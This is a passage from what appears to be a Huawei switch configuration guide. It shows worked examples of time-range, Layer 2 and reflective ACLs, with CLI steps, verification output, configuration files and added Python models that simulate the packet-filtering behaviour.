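    acl = build_acl_2001()
    for ip, when in (("172.16.105.111", "2014-01-06 15:00"),   # PC1, a Monday
                     ("172.16.107.111", "2014-01-06 15:00"),   # PC2, a Monday
                     ("172.16.107.111", "2014-01-04 15:00"),   # PC2, a Saturday
                     ("10.10.10.1", "2014-01-04 15:00")):      # PC3
        print(ip, when, check(acl, ip, when))
```

Running the script walks the same four cases as Step 5: PC1 hits rule 5 at any time, PC2 hits rule 10 only on an off-day between 14:00 and 18:00 in 2014 and falls through to rule 15 otherwise, and PC3 always hits rule 15.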

12.1.2 Example for Using ACLs to Control Access to the Specified Server in the Specified Time Range

ACL Overview
An Access Control List (ACL) consists of one rule or a set of rules that describe the packet
matching conditions. These conditions include source addresses, destination addresses, and
port numbers of packets.

An ACL is a packet filter that filters packets based on rules. A device with an ACL
configured matches packets based on the rules to obtain the packets of a certain type, and then
decides to forward or discard these packets according to the policies used by the service
module to which the ACL is applied.

Depending on the rule definition methods, ACLs include basic ACL, advanced ACL, and
Layer 2 ACL. An advanced ACL defines rules to filter IPv4 packets based on source IP
addresses, destination addresses, IP protocol types, TCP source/destination port numbers,
UDP source/destination port numbers, fragment information, and time ranges. Compared with
a basic ACL, an advanced ACL is more accurate, flexible, and provides more functions. For
example, if you want to filter packets based on source and destination IP addresses, configure
an advanced ACL.

In this example, advanced ACLs are applied to the traffic policy module so that the device can
filter the packets from users to the specified server and thus restrict access to the specified
server based on time range.

Configuration Notes
This example applies to all versions and models.

Networking Requirements
As shown in Figure 12-2, the departments of an enterprise are connected through the Switch. The
R&D and marketing departments must not be able to access the salary query server at 10.164.9.9
during work hours (08:00 to 17:30), whereas the president office can access the server at any time.

Figure 12-2 Using ACLs to control access to the specified server in the specified time range
(Figure: the Switch connects LAN Switch A (VLAN 10, president office, 10.164.1.0/24) on
GE1/0/1 with VLANIF 10 at 10.164.1.1/24; LAN Switch B (VLAN 20, marketing, 10.164.2.0/24)
on GE1/0/2 with VLANIF 20 at 10.164.2.1/24; LAN Switch C (VLAN 30, R&D, 10.164.3.0/24) on
GE1/0/3 with VLANIF 30 at 10.164.3.1/24; and the salary query server 10.164.9.9/24 on
GE2/0/1 with VLANIF 100 at 10.164.9.1/24. The Switch also connects to a Router toward the
Internet.)

Configuration Roadmap
The following configurations are performed on the Switch. The configuration roadmap is as
follows:
1. Configure the time range, advanced ACL, and ACL-based traffic classifier to filter
packets from users to the server in the specified time range. In this way, you can restrict
the access of different users to the server in the specified time range.
2. Configure a traffic behavior to discard the packets matching the ACL.
3. Configure and apply a traffic policy to make the ACL and traffic behavior take effect.

Procedure
Step 1 Add interfaces to VLANs and assign IP addresses to the VLANIF interfaces.
# Add GE 1/0/1 through GE1/0/3 to VLANs 10, 20, and 30 respectively, add GE2/0/1 to
VLAN 100, and assign IP addresses to VLANIF interfaces. The configurations on GE 1/0/1
and VLANIF 10 are used as an example here. The configurations on GE1/0/2, GE1/0/3, and
GE2/0/1 are similar to the configurations on GE 1/0/1, and the configurations on VLANIF 20,
VLANIF 30, and VLANIF 100 are similar to the configurations on VLANIF 10.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20 30 100
[Switch] interface gigabitethernet 1/0/1

[Switch-GigabitEthernet1/0/1] port link-type trunk


[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.164.1.1 255.255.255.0
[Switch-Vlanif10] quit

Step 2 Configure the time range.


# Configure the time range from 8:00 to 17:30.
[Switch] time-range satime 8:00 to 17:30 working-day //Configure a periodic time
range for an ACL.

Step 3 Configure ACLs.


# Configure an ACL for the marketing department to access the salary query server.
[Switch] acl 3002
[Switch-acl-adv-3002] rule deny ip source 10.164.2.0 0.0.0.255 destination
10.164.9.9 0.0.0.0 time-range satime //Prevent the marketing department from
accessing the salary query server in the time range satime.
[Switch-acl-adv-3002] quit

# Configure an ACL for the R&D department to access the salary query server.
[Switch] acl 3003
[Switch-acl-adv-3003] rule deny ip source 10.164.3.0 0.0.0.255 destination
10.164.9.9 0.0.0.0 time-range satime //Prevent the R&D department from accessing
the salary query server in the time range satime.
[Switch-acl-adv-3003] quit

Step 4 Configure ACL-based traffic classifiers.


# Configure the traffic classifier c_market to classify the packets that match ACL 3002.
[Switch] traffic classifier c_market //Create a traffic classifier.
[Switch-classifier-c_market] if-match acl 3002 //Associate an ACL with the
traffic classifier.
[Switch-classifier-c_market] quit

# Configure the traffic classifier c_rd to classify the packets that match ACL 3003.
[Switch] traffic classifier c_rd //Create a traffic classifier.
[Switch-classifier-c_rd] if-match acl 3003 //Associate an ACL with the traffic
classifier.
[Switch-classifier-c_rd] quit

Step 5 Configure traffic behaviors.


# Configure the traffic behavior b_market to reject packets.
[Switch] traffic behavior b_market //Create a traffic behavior.
[Switch-behavior-b_market] deny //Set the action of the traffic behavior to deny.
[Switch-behavior-b_market] quit

# Configure the traffic behavior b_rd to reject packets.


[Switch] traffic behavior b_rd //Create a traffic behavior.
[Switch-behavior-b_rd] deny //Set the action of the traffic behavior to deny.
[Switch-behavior-b_rd] quit

Step 6 Configure traffic policies.


# Configure the traffic policy p_market and associate the traffic classifier c_market and the
traffic behavior b_market with the traffic policy.
[Switch] traffic policy p_market //Create a traffic policy.
[Switch-trafficpolicy-p_market] classifier c_market behavior b_market //
Associate the traffic classifier c_market with the traffic behavior b_market.
[Switch-trafficpolicy-p_market] quit

# Configure the traffic policy p_rd and associate the traffic classifier c_rd and the traffic
behavior b_rd with the traffic policy.
[Switch] traffic policy p_rd //Create a traffic policy.
[Switch-trafficpolicy-p_rd] classifier c_rd behavior b_rd //Associate the
traffic classifier c_rd with the traffic behavior b_rd.
[Switch-trafficpolicy-p_rd] quit

Step 7 Apply the traffic policy.


# Packets from the marketing department to the server are received by GE1/0/2; therefore,
apply the traffic policy p_market to the inbound direction of GE1/0/2.
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] traffic-policy p_market inbound //Apply the
traffic policy to the inbound direction of an interface.
[Switch-GigabitEthernet1/0/2] quit

# Packets from the R&D department to the server are received by GE1/0/3; therefore, apply
the traffic policy p_rd to the inbound direction of GE1/0/3.
[Switch] interface gigabitethernet 1/0/3
[Switch-GigabitEthernet1/0/3] traffic-policy p_rd inbound //Apply the traffic
policy to the inbound direction of an interface.
[Switch-GigabitEthernet1/0/3] quit

Step 8 Verify the configuration.


# Check the configuration of ACL rules.
[Switch] display acl all
Total nonempty ACL number is 2

Advanced ACL 3002, 1 rule


Acl's step is 5
rule 5 deny ip source 10.164.2.0 0.0.0.255 destination 10.164.9.9 0 time-range
satime (match-counter 0)(Active)

Advanced ACL 3003, 1 rule


Acl's step is 5
rule 5 deny ip source 10.164.3.0 0.0.0.255 destination 10.164.9.9 0 time-range
satime (match-counter 0)(Active)

# Check the configuration of the traffic classifier.


[Switch] display traffic classifier user-defined
User Defined Classifier Information:
Classifier: c_market
Precedence: 5
Operator: OR
Rule(s) : if-match acl 3002

Classifier: c_rd
Precedence: 10
Operator: OR
Rule(s) : if-match acl 3003

Total classifier number is 2

# Check the configuration of the traffic policy.


[Switch] display traffic policy user-defined
User Defined Traffic Policy Information:
Policy: p_market
Classifier: c_market
Operator: OR
Behavior: b_market
Deny

Policy: p_rd
Classifier: c_rd
Operator: OR
Behavior: b_rd
Deny

Total policy number is 2

# Check the traffic policy application records.


[Switch] display traffic-policy applied-record
-------------------------------------------------
  Policy Name:   p_market
  Policy Index:  0
     Classifier:c_market
     Behavior:b_market
-------------------------------------------------
 *interface GigabitEthernet1/0/2
    traffic-policy p_market inbound
      slot 1    :  success
-------------------------------------------------
  Policy total applied times: 1.
-------------------------------------------------
  Policy Name:   p_rd
  Policy Index:  1
     Classifier:c_rd
     Behavior:b_rd
-------------------------------------------------
 *interface GigabitEthernet1/0/3
    traffic-policy p_rd inbound
      slot 1    :  success
-------------------------------------------------
  Policy total applied times: 1.

# The R&D and marketing departments cannot access the salary query server in work hours
(08:00 to 17:30).

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20 30 100
#
time-range satime 08:00 to 17:30 working-day
#
acl number 3002
rule 5 deny ip source 10.164.2.0 0.0.0.255 destination 10.164.9.9 0 time-range
satime
acl number 3003
rule 5 deny ip source 10.164.3.0 0.0.0.255 destination 10.164.9.9 0 time-range
satime
#
traffic classifier c_market operator or precedence 5
if-match acl 3002
traffic classifier c_rd operator or precedence 10
if-match acl 3003
#
traffic behavior b_market
deny
traffic behavior b_rd
deny
#
traffic policy p_market match-order config
classifier c_market behavior b_market
traffic policy p_rd match-order config
classifier c_rd behavior b_rd
#
interface Vlanif10
ip address 10.164.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.164.2.1 255.255.255.0
#
interface Vlanif30
ip address 10.164.3.1 255.255.255.0
#
interface Vlanif100
ip address 10.164.9.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
traffic-policy p_market inbound
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 30
traffic-policy p_rd inbound
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
return

Related Information
Support Community
ACL Application

12.1.3 Example for Using an ACL to Block Network Access of the Specified Users
ACL Overview
An Access Control List (ACL) consists of one rule or a set of rules that describe the packet
matching conditions. These conditions include source addresses, destination addresses, and
port numbers of packets.
An ACL is a packet filter that filters packets based on rules. A device with an ACL
configured matches packets based on the rules to obtain the packets of a certain type, and then
decides to forward or discard these packets according to the policies used by the service
module to which the ACL is applied.
Depending on the rule definition methods, ACLs include basic ACL, advanced ACL, and
Layer 2 ACL. A Layer 2 ACL defines rules to filter IPv4 and IPv6 packets based on Ethernet
frame information, such as source MAC addresses, destination MAC addresses, VLANs, and
Layer 2 protocol types. Basic ACLs and advanced ACLs filter packets based on Layer 3 and
Layer 4 information, while Layer 2 ACLs filter packets based on Layer 2 information. For
example, if you want to filter packets based on MAC addresses and VLANs, configure a
Layer 2 ACL.
In this example, a Layer 2 ACL is applied to the traffic policy module so that the device can
filter the packets from users with certain MAC addresses to the Internet and thus prevent these
users from accessing the Internet.

Configuration Notes
This example applies to all versions and models.

Networking Requirements
As shown in Figure 12-3, the Switch that functions as the gateway is connected to PCs. The
administrator wants to block network access of PC1 after detecting that PC1 (00e0-
f201-0101) is an unauthorized user.

Figure 12-3 Using Layer 2 ACLs to block network access of the specified users
(Figure: PC1 00e0-f201-0101 and PC2 00e0-f201-0102 connect to SwitchA, which connects to
GE2/0/1 of the Switch; GE1/0/1 of the Switch connects to the Router toward the Internet.)

Configuration Roadmap
The following configurations are performed on the Switch. The configuration roadmap is as
follows:
1. Configure a Layer 2 ACL and ACL-based traffic classifier to discard packets from MAC
address 00e0-f201-0101 (preventing the user with this MAC address from accessing the
network).
2. Configure a traffic behavior to discard the packets matching the ACL.
3. Configure and apply a traffic policy to make the ACL and traffic behavior take effect.

Procedure
Step 1 Configure an ACL.
# Configure a Layer 2 ACL to meet the preceding requirement.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] acl 4000
[Switch-acl-L2-4000] rule deny source-mac 00e0-f201-0101 ffff-ffff-ffff //Reject
the packets from source MAC address 00e0-f201-0101.
[Switch-acl-L2-4000] quit

Step 2 Configure an ACL-based traffic classifier.


# Configure the traffic classifier tc1 to classify packets that match ACL 4000.
[Switch] traffic classifier tc1 //Create a traffic classifier.
[Switch-classifier-tc1] if-match acl 4000 //Associate an ACL with the traffic
classifier.
[Switch-classifier-tc1] quit

Step 3 Configure the traffic behavior.


# Configure the traffic behavior tb1 to reject packets.
[Switch] traffic behavior tb1 //Create a traffic behavior.
[Switch-behavior-tb1] deny //Set the action of the traffic behavior to deny.
[Switch-behavior-tb1] quit

Step 4 Configure the traffic policy.


# Configure the traffic policy tp1 and associate tc1 and tb1 with the traffic policy.
[Switch] traffic policy tp1 //Create a traffic policy.
[Switch-trafficpolicy-tp1] classifier tc1 behavior tb1 //Associate the traffic
classifier tc1 with the traffic behavior tb1.
[Switch-trafficpolicy-tp1] quit

Step 5 Apply the traffic policy.


# Packets from PC1 to the Internet are received by GE2/0/1; therefore, apply the traffic policy
tp1 to the inbound direction of GE2/0/1.
[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] traffic-policy tp1 inbound //Apply the traffic
policy to the inbound direction of an interface.
[Switch-GigabitEthernet2/0/1] quit

Step 6 Verify the configuration.


# Check the configuration of the ACL rule.
[Switch] display acl 4000
L2 ACL 4000, 1 rule
Acl's step is 5
rule 5 deny source-mac 00e0-f201-0101

# Check the configuration of the traffic classifier.


[Switch] display traffic classifier user-defined
User Defined Classifier Information:
Classifier: tc1
Precedence: 5
Operator: OR
Rule(s) : if-match acl 4000

Total classifier number is 1

# Check the configuration of the traffic policy.


[Switch] display traffic policy user-defined tp1
User Defined Traffic Policy Information:
Policy: tp1
Classifier: tc1
Operator: OR
Behavior: tb1
Deny

# Check the traffic policy application records.


[Switch] display traffic-policy applied-record
-------------------------------------------------
  Policy Name:   tp1
  Policy Index:  0
     Classifier:tc1
     Behavior:tb1
-------------------------------------------------
 *interface GigabitEthernet2/0/1
    traffic-policy tp1 inbound
      slot 2    :  success
-------------------------------------------------
  Policy total applied times: 1.

# The user with MAC address 00e0-f201-0101 cannot access the Internet.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
acl number 4000
rule 5 deny source-mac 00e0-f201-0101
#
traffic classifier tc1 operator or precedence 5
if-match acl 4000
#
traffic behavior tb1
deny
#
traffic policy tp1 match-order config
classifier tc1 behavior tb1
#
interface GigabitEthernet2/0/1
traffic-policy tp1 inbound
#
return
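The following Python model is added as an illustration; it is not Huawei code and not part of this guide. It runs the traffic policies from 12.1.2 (p_market and p_rd) and from 12.1.3 (tp1) on the ports they are applied to, against constructed packets, and serves as the worked example for both sections. It makes three points the examples rely on without stating them: a rule whose time range is inactive behaves as if it did not exist, so marketing traffic to the server is forwarded outside satime; a traffic policy forwards whatever no classifier matches, so blocking has to be written as an explicit deny; and the mask conventions differ, with 0 bits significant in an IP wildcard (10.164.9.9 0.0.0.0 is one host) but 1 bits significant in a MAC mask (ffff-ffff-ffff is one address). Time ranges are passed in as the set of names currently active, mirroring the (Active) flag that display acl prints per rule. One caveat on 12.1.3: the source-MAC deny stops frames that carry 00e0-f201-0101, so a host that changes its MAC address is no longer matched; it contains a known address rather than identifying a user.

```python
"""Traffic-policy model for the two examples above (12.1.2: advanced ACLs
3002/3003 with time range satime, 12.1.3: Layer 2 ACL 4000). Added
illustration, not Huawei code. Time ranges arrive as the set of names that
are active right now, as display acl shows them per rule."""
from ipaddress import IPv4Address
from typing import Dict, List, Optional, Set, Tuple


def ip_wildcard_match(addr: str, network: str, wildcard: str) -> bool:
    """IP wildcard (inverse) mask: 0 bits must match, 1 bits are ignored,
    so '10.164.9.9 0.0.0.0' is an exact host and '0.0.0.255' a /24."""
    a, n, w = (int(IPv4Address(x)) for x in (addr, network, wildcard))
    care = ~w & 0xFFFFFFFF
    return a & care == n & care


def mac_mask_match(addr: str, mac: str, mask: str = "ffff-ffff-ffff") -> bool:
    """Layer 2 ACL MAC masks have the opposite polarity: 1 bits must match,
    0 bits are ignored. ffff-ffff-ffff is an exact match; ffff-ffff-0000 would
    match 65536 addresses. Mixing the two conventions up silently widens a rule."""
    to_int = lambda s: int(s.replace("-", ""), 16)
    a, m, k = to_int(addr), to_int(mac), to_int(mask)
    return a & k == m & k


class Rule:
    def __init__(self, action: str, time_range: Optional[str] = None, **match) -> None:
        self.action, self.time_range, self.match = action, time_range, match


class Acl:
    def __init__(self, number: int) -> None:
        self.number = number
        self.rules: List[Rule] = []

    def first_match(self, pkt: Dict, active_ranges: Set[str]) -> Optional[Rule]:
        """First active rule the packet matches, or None."""
        for r in self.rules:
            if r.time_range and r.time_range not in active_ranges:
                continue                       # (Inactive): behaves as if absent
            m = r.match
            if "proto" in m and m["proto"] != "ip" and m["proto"] != pkt.get("proto"):
                continue                       # 'ip' matches any IP protocol
            if "src" in m and not ip_wildcard_match(pkt["src"], *m["src"]):
                continue
            if "dst" in m and not ip_wildcard_match(pkt["dst"], *m["dst"]):
                continue
            if "src_mac" in m and not mac_mask_match(pkt["src_mac"], *m["src_mac"]):
                continue
            return r
        return None


class TrafficPolicy:
    """traffic classifier (if-match acl) -> traffic behavior, bound by
    'classifier X behavior Y'; classifiers are tried in configuration order."""
    def __init__(self, name: str) -> None:
        self.name = name
        self.bindings: List[Tuple[Acl, str]] = []

    def apply(self, pkt: Dict, active_ranges: Set[str]) -> str:
        for acl, behavior in self.bindings:
            if acl.first_match(pkt, active_ranges) is not None:
                return behavior
        # No classifier matched: the packet is forwarded. A traffic policy has
        # no implicit deny, so blocking must be written as explicit deny rules.
        return "permit"


class Interface:
    """The inbound policy sees only traffic entering the switch on this port,
    which is why p_market sits on GE1/0/2 (marketing) and p_rd on GE1/0/3 (R&D)."""
    def __init__(self, name: str, inbound: Optional[TrafficPolicy] = None) -> None:
        self.name, self.inbound = name, inbound

    def receive(self, pkt: Dict, active_ranges: Optional[Set[str]] = None) -> str:
        if self.inbound is None:
            return "permit"
        return self.inbound.apply(pkt, active_ranges or set())


def build_interfaces() -> Dict[str, Interface]:
    """Ingress ports of both examples (they belong to different switches in the
    figures; grouped here only for the demonstration)."""
    acl3002, acl3003, acl4000 = Acl(3002), Acl(3003), Acl(4000)
    acl3002.rules.append(Rule("deny", "satime", proto="ip",
                              src=("10.164.2.0", "0.0.0.255"), dst=("10.164.9.9", "0.0.0.0")))
    acl3003.rules.append(Rule("deny", "satime", proto="ip",
                              src=("10.164.3.0", "0.0.0.255"), dst=("10.164.9.9", "0.0.0.0")))
    acl4000.rules.append(Rule("deny", src_mac=("00e0-f201-0101", "ffff-ffff-ffff")))
    p_market, p_rd, tp1 = TrafficPolicy("p_market"), TrafficPolicy("p_rd"), TrafficPolicy("tp1")
    p_market.bindings.append((acl3002, "deny"))
    p_rd.bindings.append((acl3003, "deny"))
    tp1.bindings.append((acl4000, "deny"))
    return {"GE1/0/2": Interface("GE1/0/2", p_market),
            "GE1/0/3": Interface("GE1/0/3", p_rd),
            "GE2/0/1": Interface("GE2/0/1", tp1)}


if __name__ == "__main__":
    ifs = build_interfaces()
    mkt = {"proto": "tcp", "src": "10.164.2.10", "dst": "10.164.9.9"}
    print("marketing, work hours:", ifs["GE1/0/2"].receive(mkt, {"satime"}))
    print("marketing, off hours: ", ifs["GE1/0/2"].receive(mkt, set()))
    print("PC1 on GE2/0/1:       ", ifs["GE2/0/1"].receive({"src_mac": "00e0-f201-0101"}))
```

In the model, rules and behaviors are both deny, as in both examples, so nothing depends on how a permit rule would combine with a deny behavior; if you reuse the model for other actions, check that combination against the device documentation first.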

12.1.4 Example for Using Reflective ACL to Implement Unidirectional Access Control

Reflective ACL Overview


Reflective ACL is a type of dynamic ACL. The device creates a reflective ACL entry by swapping
the source/destination IP addresses and source/destination port numbers of a packet that
matches the configured ACL. A reflective ACL entry has an aging time. If a packet passing
through the interface matches the entry before the aging time expires, the entry is kept for
another aging interval; if no packet matches it within the aging time, the entry is deleted.
This mechanism improves device security.

Reflective ACL implements unidirectional access control. An external host can access an
internal host only after the internal host accesses the external host first. Therefore, reflective
ACL protects enterprises' internal networks against attacks initiated by external users.

In this example, an advanced reflective ACL is used to prevent the servers on the Internet
from actively establishing UDP connections with internal hosts. The external servers can
establish UDP connections with internal hosts only after the internal hosts connect to the
external servers first. Reflective ACL implements unidirectional access control between
internal and external networks.
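The following Python model is added as an illustration; it is not Huawei code and not part of this guide. It implements the behaviour described above: an outbound UDP packet matched by the trigger ACL creates a reflected entry with addresses and ports swapped, an inbound packet is admitted only while a matching entry is live, each hit restarts the aging timer, and an idle entry is deleted. The aging time of 300 s is taken from the Timeout column of display traffic-reflect in this example; the addresses are those of Figure 12-4 and the port numbers are constructed. Note that the entry is checked on the 5-tuple only, so during its lifetime any packet carrying that tuple is admitted: the mechanism limits who can open a flow, not what the flow carries.

```python
"""Reflective ACL model for the mechanism described above (added illustration,
not Huawei code). An outbound packet matching the trigger ACL creates an entry
with source/destination addresses and ports swapped; inbound packets are
admitted only by a live entry, a hit refreshes the entry, and an idle entry
is deleted when the aging time expires. 300 s is the Timeout shown in Step 3."""
from typing import Dict, Tuple

AGING_S = 300
FlowKey = Tuple[str, str, int, str, int]          # (proto, sip, sp, dip, dp)


class ReflectiveAcl:
    def __init__(self, trigger_protos=("udp",), aging_s: int = AGING_S) -> None:
        self.trigger_protos = trigger_protos       # 'rule permit udp' in ACL 3000
        self.aging_s = aging_s
        self.entries: Dict[FlowKey, Dict[str, float]] = {}

    def outbound(self, pkt: Dict, now: float) -> bool:
        """Packet leaving toward the Internet (outbound on GE2/0/1). Matching
        packets create or refresh the mirrored entry; returns whether one did."""
        if pkt["proto"] not in self.trigger_protos:
            return False
        key = (pkt["proto"], pkt["dip"], pkt["dp"], pkt["sip"], pkt["sp"])   # swapped
        e = self.entries.setdefault(key, {"count": 0, "expires": 0.0})
        e["expires"] = now + self.aging_s
        return True

    def inbound(self, pkt: Dict, now: float) -> bool:
        """Packet arriving from the Internet. Admitted only by a live entry whose
        5-tuple it carries; the entry checks addresses and ports, nothing else."""
        self.expire(now)
        key = (pkt["proto"], pkt["sip"], pkt["sp"], pkt["dip"], pkt["dp"])
        e = self.entries.get(key)
        if e is None:
            return False
        e["count"] += 1
        e["expires"] = now + self.aging_s          # a hit restarts the aging timer
        return True

    def expire(self, now: float) -> None:
        """Delete entries that saw no matching packet for a full aging interval."""
        for key in [k for k, e in self.entries.items() if e["expires"] <= now]:
            del self.entries[key]


def make_pkt(proto: str, sip: str, sp: int, dip: str, dp: int) -> Dict:
    return {"proto": proto, "sip": sip, "sp": sp, "dip": dip, "dp": dp}


def scenario() -> Dict[str, bool]:
    """PC1 10.1.1.2 and PC2 10.1.1.3 behind the Switch, server 192.168.1.2
    outside. Constructed packets; the port numbers are assumptions."""
    r = ReflectiveAcl()
    out = {}
    # Server speaks first to PC2: no entry, dropped.
    out["unsolicited"] = r.inbound(make_pkt("udp", "192.168.1.2", 53, "10.1.1.3", 4000), now=0)
    # PC1 speaks first: mirrored entry created, so the server's reply gets in.
    r.outbound(make_pkt("udp", "10.1.1.2", 5000, "192.168.1.2", 53), now=1)
    out["reply"] = r.inbound(make_pkt("udp", "192.168.1.2", 53, "10.1.1.2", 5000), now=2)
    # Same server, but a different PC1 port: not the mirrored tuple.
    out["other_port"] = r.inbound(make_pkt("udp", "192.168.1.2", 53, "10.1.1.2", 5001), now=3)
    # Idle for longer than the aging time: entry deleted.
    out["after_aging"] = r.inbound(make_pkt("udp", "192.168.1.2", 53, "10.1.1.2", 5000),
                                   now=2 + AGING_S + 1)
    # TCP is not in ACL 3000, so it never creates an entry.
    r.outbound(make_pkt("tcp", "10.1.1.2", 6000, "192.168.1.2", 80), now=400)
    out["tcp_reply"] = r.inbound(make_pkt("tcp", "192.168.1.2", 80, "10.1.1.2", 6000), now=401)
    return out


if __name__ == "__main__":
    for case, admitted in scenario().items():
        print(f"{case:12s} admitted={admitted}")
```

The scenario mirrors the requirement above: the external server reaches an internal host only after that host has sent to it, and only on the exact port pair the host used.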

Configuration Notes
This example applies to all S12700 versions.

Networking Requirements
As shown in Figure 12-4, Switch functions as the gateway to connect PCs to the Internet.
There are reachable routes among the devices. To ensure internal network security, the
administrator allows servers on the Internet to establish UDP connections with internal PCs
only after the internal PCs have established UDP connections with the external servers.

Figure 12-4 Using reflective ACL to implement unidirectional access control
(Figure: PC1 10.1.1.2/24 and PC2 10.1.1.3/24 connect to SwitchA, which connects to GE1/0/1 of
the Switch; GE2/0/1 of the Switch connects to the Router toward the Internet, where the
Server 192.168.1.2 is located.)

Configuration Roadmap
The following configurations are performed on the Switch. The configuration roadmap is as
follows:
1. Configure an advanced ACL based on which the device will generate a reflective ACL.
2. Configure the reflective ACL function to allow internal PC1 to establish a UDP
connection with a server on the Internet and prevent the external server from actively
establishing a UDP connection with internal hosts.

Procedure
Step 1 Configure an advanced ACL.
# Create advanced ACL 3000 and configure a rule to permit UDP packets.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] acl 3000
[Switch-acl-adv-3000] rule permit udp //Allow UDP packets to pass.
[Switch-acl-adv-3000] quit

Step 2 Configure the reflective ACL function.


# Packets from the Internet are received by GE2/0/1; therefore, configure the reflective ACL
function in the outbound direction of GE2/0/1 so that the Switch can generate reflective ACL
for UDP packets.
[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] traffic-reflect outbound acl 3000 //Apply the reflective ACL to the outbound direction of an interface.
[Switch-GigabitEthernet2/0/1] quit

Step 3 Verify the configuration.

Run the display traffic-reflect command to check reflective ACL information.


[Switch] display traffic-reflect outbound acl 3000
Proto SP DP DIP SIP Count Timeout Interface
------------------------------------------------------------------------------
UDP 2 80 192.168.1.2 10.1.1.2 9 300(s) GigabitEthernet2/0/1
------------------------------------------------------------------------------
* Total <1> flows accord with condition, <1> items was displayed.
------------------------------------------------------------------------------
* Proto=Protocol,SIP=Source IP,DIP=Destination IP,Timeout=Time to cutoff,
* SP=Source port,DP=Destination port,Count=Packets count(data).

The preceding information will be displayed only after internal hosts have established UDP
connections with external servers. The preceding information shows that a reflective ACL has
been generated on GE2/0/1 for the UDP packets between PC1 and server (192.168.1.2), and
provides packet statistics.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
acl number 3000
rule 5 permit udp
#
interface GigabitEthernet2/0/1
traffic-reflect outbound acl 3000
#
return

12.1.5 Example for Allowing Certain Users to Access the Internet in the Specified Time Range

ACL Time Range Overview


An ACL defines many matching conditions to filter most packets transmitted on a network; on
its own, however, it cannot restrict filtering to a specified time range.

You can configure a time range and associate the time range with an ACL rule to filter
packets based on time. In this way, you can specify different policies for users in different
time ranges.

In this example, a basic ACL associated with a time range is applied to the traffic policy
module so that the device can filter packets from internal users to the Internet in the specified
time range. As a result, users can access the Internet only in the specified time range.

Configuration Notes
This example applies to all versions and models.


Networking Requirements
As shown in Figure 12-5, the departments of an enterprise are connected through the Switch.
The enterprise allows all employees to access the Internet on work days (Monday to Friday),
and only the managers to access the Internet on weekends (Saturday and Sunday).

Figure 12-5 Allowing certain users to access the Internet in the specified time range
[Figure: LAN Switch A (VLAN 10; R&D: 10.1.1.0/24; R&D manager's host: 10.1.1.11) -- GE1/0/1 (VLANIF 10, 10.1.1.1/24) -- Switch -- GE2/0/1 -- Router -- Internet; LAN Switch B (VLAN 20; Marketing: 10.1.2.0/24; Marketing manager's host: 10.1.2.12) -- GE1/0/2 (VLANIF 20, 10.1.2.1/24) -- Switch]

Configuration Roadmap
The following configurations are performed on the Switch. The configuration roadmap is as
follows:
1. Configure the time range, basic ACL, and ACL-based traffic classifier to filter packets
from internal users to the Internet and thus allow only certain users to access the Internet
in the specified time range.
2. Configure a traffic behavior to permit the packets that match the ACL permit rule.
3. Configure and apply a traffic policy to make the ACL and traffic behavior take effect.

Procedure
Step 1 Configure VLANs and IP addresses for interfaces.
# Create VLAN 10 and VLAN 20.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20

# Configure GE1/0/1 and GE1/0/2 of the Switch as trunk interfaces and add them to VLAN
10 and VLAN 20 respectively. Configure GE2/0/1 of the Switch as a trunk interface and add
it to both VLAN 10 and VLAN 20.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type trunk
[Switch-GigabitEthernet1/0/2] port trunk allow-pass vlan 20
[Switch-GigabitEthernet1/0/2] quit


[Switch] interface gigabitethernet 2/0/1


[Switch-GigabitEthernet2/0/1] port link-type trunk
[Switch-GigabitEthernet2/0/1] port trunk allow-pass vlan 10 20
[Switch-GigabitEthernet2/0/1] quit

# Create VLANIF 10 and VLANIF 20 and assign IP addresses to them.


[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.1.1.1 24
[Switch-Vlanif10] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 10.1.2.1 24
[Switch-Vlanif20] quit

Step 2 Configure a time range.


# Configure the periodic time range from Saturday to Sunday.
[Switch] time-range rest-time 0:00 to 23:59 off-day //Configure a periodic time
range for an ACL.

Step 3 Configure an ACL.


# Create basic ACL 2001 and configure rules to allow the R&D and marketing managers
(10.1.1.11 and 10.1.2.12) to access the Internet anytime and prevent other employees from
accessing the Internet on Saturday and Sunday. That is, only the managers of R&D and
marketing departments can access the Internet on Saturday and Sunday.
[Switch] acl 2001
[Switch-acl-basic-2001] rule permit source 10.1.1.11 0 //Allow the manager of
the R&D department to access the Internet anytime.
[Switch-acl-basic-2001] rule permit source 10.1.2.12 0 //Allow the manager of
the marketing department to access the Internet anytime.
[Switch-acl-basic-2001] rule deny time-range rest-time //Prevent other users from accessing the Internet on Saturday and Sunday.
[Switch-acl-basic-2001] quit

Step 4 Configure the basic ACL-based traffic classifier.


# Configure the traffic classifier tc1 to classify packets that match ACL 2001.
[Switch] traffic classifier tc1 //Create a traffic classifier.
[Switch-classifier-tc1] if-match acl 2001 //Associate an ACL with the traffic
classifier.
[Switch-classifier-tc1] quit

Step 5 Configure traffic behaviors.


# Configure the traffic behavior tb1 and set the action to permit (default value).

NOTE

Packets matching the ACL are discarded as long as a deny action exists in an ACL rule or traffic behavior.
